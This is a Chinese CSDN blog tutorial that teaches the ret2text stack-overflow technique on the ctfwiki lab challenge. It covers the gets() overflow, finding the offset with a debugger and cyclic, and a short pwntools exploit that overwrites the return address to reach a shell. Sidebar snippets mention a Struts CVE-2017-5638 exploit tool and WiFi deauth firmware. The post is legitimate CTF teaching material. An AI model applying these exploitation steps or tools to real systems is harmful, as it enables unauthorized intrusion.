pwn小白入门03---ret2text

最新推荐文章于 2024-04-04 11:52:25 发布
最新推荐文章于 2024-04-04 11:52:25 发布
阅读量5.9k 收藏 64
点赞数 15
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45943522/article/details/113918267
版权

什么是栈溢出:

栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。
最简单的栈溢出利用:ret2text
通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取出放入eip寄存器中,紧接着执行eip所指向的位置的指令,这样就相当于控制了程序的执行流。

例题:ctfwiki ret2text

首先,cheaksec。

在这里插入图片描述

32位小端序程序。
开启了堆栈不可执行保护(NX),即不会把堆栈上的数据当成指令来执行。
没有canary保护,可以利用栈溢出来修改eip。
PIE地址随机化没有开启。

ida分析

如果源码比较复杂,可以通过运行程序的方式来辅助理解程序。
main函数存在gets函数,即存在栈溢出漏洞。
在这里插入图片描述

存在一个secure函数,函数内部调用了system(“/bin/sh”),即后门函数,程序中调用了该函数后可以获得一个shell。
在这里插入图片描述

在ida视图下,可以看到system函数地址为0x0804863A
在这里插入图片描述

思路:首先通过栈溢出填充垃圾数据,覆盖到eip之前,再填入system函数地址,即可获得shell。

如何确定栈溢出所需要的垃圾数据长度?

方式一:通过ida可以观察出来,但有时结果不太准确。

在这里插入图片描述

上图显示0x64的大小即可覆盖到ebp,但却与动态调试的结果不同。(有时候动态调试结果也不太准确,一般以动态调试结果为准,也可以动态调试结果和ida结果分别尝试一次)

方式二:动态调试

在call函数处下断点,输入aaaa,
在这里插入图片描述

在这里插入图片描述

aaaa所在的地址为0xffffd24c,ebp为 0xffffd2b8,相减得0x6c,即覆盖0x6c个垃圾数据“a”即可到达ebp的位置。
在这里插入图片描述

此时再覆盖4字节的垃圾数据“b”(32位程序为4字节,64位程序为8字节):
在这里插入图片描述

此时如果再往里输入数据,就可以修改eip的值,我们此时输入system函数的地址,即可完成利用。
在上述过程中,我们向程序输入了(0x6c+4)的垃圾数据。

手算比较麻烦,还有一种小工具cyclic

首先输入cyclic 200:
在这里插入图片描述

得到一组数据,将其复制下来,然后用gdb调试程序,输入r运行,运行之后将这段程序输入进去:
在这里插入图片描述

之后程序报错:
在这里插入图片描述

这说明我们输入的字符覆盖了eip,即字符“daab”,输入cyclic -l daab就能知道输入点到eip的距离,即【0x6c+4】的值:
在这里插入图片描述

exp:

from pwn import *  //引入pwntools模块
sh = process('./ret2text')//包含本地程序
#sh = remote('6.6.6.6',888)//包含6.6.6.6服务器的888端口的程序
target = 0x804863a//返回地址
sh.sendline('A' * (0x6c + 4) + p32(target))
//p32()表示将数据转换为32位系统下在内存中的存在方式
sh.interactive()//接收交互结果
苏璃只想划水
关注
  • 15
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
入门pwn题目ret2text
03-26
入门pwn题目ret2text
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
浅谈 ret2text
akdelt的博客
01-21 911
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ret2text(system($0)),带你彻底搞懂网络安全启动速度优化
最新发布
2401_84102720的博客
04-04 637
我们看道例题经典nx,栈迁移,本该是很简单的一道题,但是涉及到system($0),就难理解了一点点,仅仅是一点点废话不多说,距离rbp,0x10,填充0x18覆盖rbp,构造ret,这时候我们发现有system函数,没有/bin/sh,怎么办,可能有小伙伴想ret2libc,当然可以,但是太过麻烦,我们发现有的tips函数还没有看我们直接进去西索我们详细分析这串代码:这段文本是一个反汇编代码片段,它描述了一个名为tips的函数或过程的汇编实现。这行标记了一个名为tips。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 2941
pwn笔记 - ret2text - 函数传参
ROP初探之ret2text
chlet的博客
05-05 476
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 1683
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出? 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
二进制漏洞挖掘之ret2text栈溢出
brucexia的专栏
01-31 590
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
[二进制安全学习]ret2text
Y4tacker的博客
07-12 1241
文章目录写在前面前置小知识bss段data段text段heapstackret2text参考链接 写在前面 已经学了一小段时间二进制了,以后慢慢确定一个深入的方向吧,开冲 前置小知识 bss段 bss段(bss segment)通常是指用来存放程序中未初始化的全局变量的一块内存区域。 bss是英文Block Started by Symbol的简称。 bss段属于静态内存分配。 比如 int a; data段 数据段(data segment)通常是指用来存放程序中已初始化的全局变量的一块内存区域。 数据
ret2libc2pwn 入门
02-11
pwn 入门
ret2text涉及到的堆栈平衡问题-附件资源
03-05
ret2text涉及到的堆栈平衡问题-附件资源
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代了传统的线性稳压电源。开关电源的控制技术主要有三种:(1)脉冲宽度调制(PWM);(2)脉冲频率调制(PPN);(3)脉冲宽度频率调制(PWN
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
template-text:模板中的文字可用于所有用途
03-27
模板文字 使用LiveScript语法从模板生成文本以用于所有目的。 使用eval因此应始终将其与拥有/审阅的template.file 。 用法 用npm安装: npm install --save template-text 命令名称和参数: tt -c config.file -o output.file template.file 您还可以要求将模块作为配置,以使用该模块中模板中的功能: tt -r some-module -o output.file template.file 原料药 通过template-text api以编程方式插值您的模板: tt = require("template-text") cfg = function() { return { ... }; } || { ... }; ret = tt("<template>"
pwn入门学习-附件资源
03-05
pwn入门学习-附件资源
[PWN][进阶篇]Rop-Ret2Text介绍及实例教学
网络安全知识分享
03-22 6359
Rop-Ret2Text介绍及实例教学1、前提知识2、实例教学 1、前提知识 什么是Rop系统攻击 是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP也有其不同于正常程序的内在特征: (1)ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开始和结束; (2)ROP控制流中,jmp指令在不同的库函数甚至不同的库之间跳转,攻击者抽取的指令序列可能取自任意一个二进制文件
好好说话之ret2text
hollk’s blog
06-22 1941
本题为bamboofox-ret2text 题目路径: /ctf-challenges/pwn/stackoverflow/ret2text/bamboofox-ret2text 一、原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadget...
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏璃只想划水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值